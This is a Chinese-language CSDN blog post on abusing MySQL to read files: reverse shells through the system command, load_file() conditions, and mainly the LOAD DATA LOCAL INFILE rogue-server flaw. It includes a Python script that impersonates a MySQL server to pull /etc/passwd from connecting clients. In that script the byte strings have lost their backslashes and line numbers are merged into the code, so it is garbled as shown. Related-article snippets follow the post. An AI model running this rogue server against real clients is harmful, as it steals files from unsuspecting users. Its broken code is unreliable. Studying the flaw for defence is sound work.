mysql读取大文件_关于mysql几种读取文件及利用的方式

最新推荐文章于 2023-10-24 14:35:07 发布
最新推荐文章于 2023-10-24 14:35:07 发布
阅读量370 收藏
点赞数
文章标签: mysql读取大文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35817545/article/details/113465790
版权
本文介绍了MySQL在不同场景下读取大文件的方法,包括system命令的反弹shell功能,load_file()的使用条件及其在5.6.34后的限制,以及load data infile的远程读取文件漏洞。通过详细步骤和示例,展示了如何利用这些方法读取和传输文件。
摘要由CSDN通过智能技术生成

2ff34e647e2e3cdfd8dca593e17d9b0a.png

1.system

7a7405edb0c4c745156cae22f23b2241.png

可以反弹shell

c21168ab8dcccf78a89961d25d1b7265.png

d216938f9e0563df66a17a23baf7cc48.png

可以通过堆叠查询使用,比较适合phpmyadmin,如果直接在有漏洞的页面注入会产生不可预料的错误(以php为例,一般会使用mysqli_fetch_array取查询出的条目,需要符合条件的条目)

c7fa50466ba116a2cca11b73d8621632.png

windows下system似乎没有作用

2.load_file()

使用load_file()是要有条件的

1.在mysql下读写文件secure_file_priv的值不为NULL,这在mysql突破secure_file_priv写shell文章里有写

2.需要拥有所需文件的权限

ddbc760acceb8c201f7788f1cd28a653.png

然而在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL,即默认无法写入写出,需要修改secure_file_priv

3.load data infile

683f02c2c18d06f42598f342205872c8.png

关于load data infile,存在一个伪造服务端任意读取客户端文件的问题,这里参考了很多网上大牛的资料,还原一下这个漏洞。

远程连接Mysql的过程具体如下:

1.客户端发起tcp连接,服务器返回一个greeting,包含了服务器mysql版本等信息

f918c98851f00981595b54d38e3cd545.png

2.login request

90a6bfac8f6a5fca9f364ee5a7d0978f.png

3.初始化查询

8a92b156c57c95808be57a9336c8bc1b.png

4.要进行load data local infile,这里有个坑,即使set global local_infile = ‘ON’ 后还是报错,所以只能登录时加–enable-local-infile参数,插入成功

31984292e016b745372d9da531a82805.png

5.服务端返回一个TABULAR请求,请求客户端的/etc/passwd 文件

154c63c4715a3b2a813c4d5df472dd8f.png

6./etc/passwd 中的内容成功传到了服务端

25858f122cad06613d60fe563bb909af.png

这里可以伪造一个服务端,当客户端连接完成时发送一个TABULAR请求来任意读取客户端中有权限的文件信息

服务端的伪造脚本1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23#https://www.cnblogs.com/apossin/p/10127496.html

#coding=utf-8

import socket

import logging

logging.basicConfig(level=logging.DEBUG)

filename="/etc/passwd"

sv=socket.socket()

sv.bind(("",3306))

sv.listen(5)

conn,address=sv.accept()

logging.info('Conn from: %r', address)

conn.sendall("x4ax00x00x00x0ax35x2ex35x2ex35x33x00x17x00x00x00x6ex7ax3bx54x76x73x61x6ax00xffxf7x21x02x00x0fx80x15x00x00x00x00x00x00x00x00x00x00x70x76x21x3dx50x5cx5ax32x2ax7ax49x3fx00x6dx79x73x71x6cx5fx6ex61x74x69x76x65x5fx70x61x73x73x77x6fx72x64x00") #greeting包

conn.recv(9999)

logging.info("auth okay")

conn.sendall("x07x00x00x02x00x00x00x02x00x00x00") #reponse ok包

conn.recv(9999)

logging.info("want file...")

wantfile=chr(len(filename)+1)+"x00x00x01xFB"+filename #长度+数据包序号(1)+读取文件名

conn.sendall(wantfile)

content=conn.recv(9999)

logging.info(content)

conn.close()

读取成功

a1538f74a6c2f4353af5f308ec3099e4.png

BJWcn
关注
5-2 MySQL数据库读取外部文件
weixin_43263566的博客
10-19 655
MySQL数据库读取外部文件
mysql读取文件_jdbc往mysql读取大文本文件
weixin_34711401的博客
01-28 118
package jdbc;import java.io.File;import java.io.FileReader;import java.io.FileWriter;import java.io.Reader;import java.sql.Connection;import java.sql.PreparedStatement;import java.sql.ResultSet;import...
mysql 8.0 自定义函数_MySQL文件读取
weixin_39946274的博客
11-22 493
点击蓝字,关注我们本文作者:flashine (团队成员)本文字数:1200阅读时长:10min附件/链接:点击查看原文下载声明:请勿用作违法用途,否则后果自负本文属于WgpSec原创奖励计划,未经许可禁止转载读取服务端文件读取文件利用方式load_file()select load data infile() 利用该函数读文件时需要将文件内容保存至一个表中,在方便查看结果的情况下,一般...
mysql读取文件_MySQL文件读取
weixin_34254083的博客
02-07 964
读取服务端文件读取文件利用方式load_file()select load_file('/etc/passwd')load data infile() 利用该函数读文件时需要将文件内容保存至一个表中,在方便查看结果的情况下,一般最好自己创建一个新表来保存查询的结果。-- 创建存储结果的表create table result(cmd text);-- 读取文件内容到表中load data infi...
mysql读取文件
最新发布
why811的博客
10-24 423
一句话总结:伪造恶意的mysql客户端去请求服务器的资源于是出现的常见payload有如下几种
mysql对本地文件读取_MySQL文件读取
weixin_35648203的博客
02-08 4282
读取服务端文件读取文件利用方式load_file()select load_file('/etc/passwd')load data infile()利用该函数读文件时需要将文件内容保存至一个表中,在方便查看结果的情况下,一般最好自己创建一个新表来保存查询的结果。-- 创建存储结果的表create table result(cmd text);-- 读取文件内容到表中load data infil...
QT-Mysql-Blob.zip_mysql blob_qt blob 文件_qt blob类型_qt的blob
09-19
例如,对于大文件,可能需要考虑分块读写,以避免一次性加载大量内存。此外,你还需要确保数据库的索引策略考虑到BLOB字段,因为BLOB字段不适合作为主键或频繁进行索引查找。 在实际应用中,你可能还会遇到其他挑战...
MySQL_Fake_Server:MySQL Fake Server用于帮助MySQL客户端文件读取和JDBC客户端Java反序列化
04-22
MySQL服务端读取客户端文件漏洞利用 MySQL JDBC客户端Java反序列化漏洞利用 说明 需要python3环境,无任何其它依赖。 运行:python server.py 需要才能用反序列化功能,支持ServerStatusDiffInterceptor和...
python读取txt文件将数据导入mysql数据库
01-20
在测试的时候,需要造模拟数据,或者是将生产环境的数据导出到测试环境中去,本文记录通过python读取txt文件,并将数据导入mysql数据库 1、示例代码: import pymysql # 打开数据库连接 conn = pymysql.connect(host...
如何利用Golang解析读取Mysql备份文件
09-09
在特定情况下,如误操作导致数据丢失,恢复过程可能复杂,而通过编程语言来读取和处理这些大文件可以提供高效且灵活的解决方案。 首先,让我们了解MySQL的备份文件。通常,MySQL的备份文件是以SQL脚本的形式存在的...
mysql文件
路漫漫其修远兮
12-29 470
MySQL的每个数据库都对应存放在一个与数据库同名的文件夹中,MySQL数据库文件包括MySQL(server)所建数据库文件MySQL(server)所用存储引擎创建的数据库文件。       .frm文件:存储数据表的框架结构,文件名与表名相同,每个表对应一个同名frm文件,与操作系统和存储引擎无关,即不管MySQL运行在何种操作系统上,使用何种存储引擎,都有这个文件。   \MySQ...
php mysql 读取大_MySQL+PHP大文件读取和写库-阿里云开发者社区
weixin_42491621的博客
01-28 123
文件内容写入数据库问题和困难1.文件太大,数据不能一次读取2.数据存在冗余,所以不能单纯的插入操作解决1.按行读取文件,计数累加,超过10000万行进行写库操作while ($str = fgetcsv($file)) { //每次读取CSV里面的一行内容$str = explode(" ",$str[0]);$insert_data[] = array('phone' => $st...
mysql数据库怎么读文件_mysql数据库读写文件
weixin_33464176的博客
02-07 2412
环境:centos7mysql 5.6.47用户:root@localhost条件mysql中涉及到读写操作,必然离不开secure_file_priv参数,它的值限制load data,select … outfile,load_file()函数可作用的文件位置。secure_file_priv:值为NULL表示禁止限制操作值为某一目录,则只能操作该目录下的文件没有值则表示不对读写文件进行限制查...
Mysql LOAD DATA读取客户端任意文件
蚁景网安学院
04-06 903
MySQL客户端和服务端通信过程中是通过对话的形式来实现的,客户端发送一个操作请求,然后服务端根据客户端发送的请求来响应客户端,在这个过程中客户端如果一个操作需要两步才能完成,那么当它发送完第一个请求过后并不会存储这个请求,而是直接丢弃,所以第二步就是根据服务端的响应来继续进行,这里服务端就可以欺骗客户端做一些事情。
mysql 导入超大文件怎么打开_mysql source命令超大文件导入方法总结
weixin_30199299的博客
01-18 581
本文章来给各位朋友介绍利用mysql source命令超大文件导入方法总结,下面收集了两种解决办法,一种是把数据库分文件导出然后再导入,另一种是修改my.ini配置文件,下面我一一给各位朋友介绍。导入1G的数据,但是在怎么都导入不了,用命令行就可以轻松搞定了。用mysql source命令可以导入比较大的文件。代码如下复制代码mysql>use dbtest;mysql>set nam...
python语法-MySQL数据库(综合案例:读取文件,写入MySQL数据库中)
qq_45833373的博客
06-12 263
python语法-MySQL数据库(综合案例:读取文件,写入MySQL数据库中)
mysql文件导入
qq_22385935的博客
01-14 461
window 版本: mysql文件导入(linux版本同理) 1、首先进去mysql命令行模式 2、选择数据库 use mk-huk; 3、设置文件编码 set names utf8; 4、改变限制 (1)临时修改:mysql>set global max_allowed_packet=524288000;修改 #512M (2)修改my.cnf,需重启mysql。 在 [MySQLd...
mysql读写文件利用
m0_37622973的博客
07-14 285
本文主要内容摘自freebuf 原文链接:https://www.freebuf.com/articles/web/243136.html mysql读写文件利用 1.读文件 load_file 条件: (1)系统中关闭了selinux (2)知道文件路径 (3)secure_file_priv可读到web目录(secure_file_priv配置为空) eg:select load_file(“路径”); load data infile 条件: (1)系统中关闭了selinux (2)知道文件路径 (3
文件mysql处理_php+mysql实现大文件处理
weixin_33610261的博客
01-27 134
文件内容写入数据库问题和困难1.文件太大,数据不能一次读取2.数据存在冗余,所以不能单纯的插入操作解决1.按行读取文件,计数累加,超过10000万行进行写库操作while ($str = fgetcsv($file)) { //每次读取CSV里面的一行内容$str = explode("",$str[0]);$insert_data[] = array('phone' => $str[0]...
C++实现MySQL数据库中二进制图片存储与读取操作教程
在本文档中,作者介绍了如何使用C++ Connector for MySQL来处理图片存储和读取操作。首先,确保已安装和配置了MySQL驱动程序,通过`mysql::MySQL_Driver`实例化连接到本地的MySQL服务器(用户名和密码分别为"root"和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值